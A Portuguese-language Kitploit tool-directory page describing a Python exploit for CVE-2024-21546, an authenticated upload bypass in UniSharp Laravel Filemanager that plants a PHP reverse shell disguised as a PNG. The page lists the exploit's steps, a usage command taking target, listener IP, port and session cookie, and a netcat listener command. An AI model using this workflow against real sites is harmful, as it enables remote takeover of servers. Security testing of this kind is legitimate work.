Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-21546 — Este script de exploit em Python tem como alvo um Laravel Filemanager vulnerável criado pela UniSharp, que permite que usuários autenticados contornem as restrições de arquivos e carreguem arquivos maliciosos. Isso pode levar à Execução Remota de Código (RCE) quando o payload carregado é acionado. | Kitploit
Ferramentas/GitHubGitHub/ajdumanhug/cve-2024-21546
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubajdumanhug/cve-2024-21546

CVE-2024-21546

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
512há 1 anoAinda não revisado

Sobre

Este script de exploit em Python tem como alvo um Laravel Filemanager vulnerável criado pela UniSharp, que permite que usuários autenticados contornem as restrições de arquivos e carreguem arquivos maliciosos. Isso pode levar à Execução Remota de Código (RCE) quando o payload carregado é acionado.

Compartilhar

Exploit Python CVE-2024-21546

🔥 Descrição

Este script de exploit Python tem como alvo um Laravel Filemanager vulnerável criado por UniSharp, que permite que usuários autenticados contornem restrições de arquivos e enviem arquivos maliciosos. Isso pode levar à Execução Remota de Código (RCE) quando o payload enviado é acionado.

O exploit realiza o seguinte:

  • Valida o laravel_session fornecido pelo usuário
  • Extrai o _token CSRF via regex
  • Envia um arquivo PNG falso contendo um payload de reverse shell em PHP
  • Aciona o arquivo enviado

⚠️ Versões Afetadas

Versão 2.9.1 e versões anteriores

⚙️ Uso

root@kitploit:~
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>

Importante: inicie seu listener antes de executar o script:

root@kitploit:~
nc -lvnp <listener_port>

💻 Exemplo de Execução

image

ℹ️ Referências

  • CVE-2024-21546
  • RCE através de Upload Shell no Laravel Filemanager da UniSharp
  • Commit 8170760
Baixar ferramenta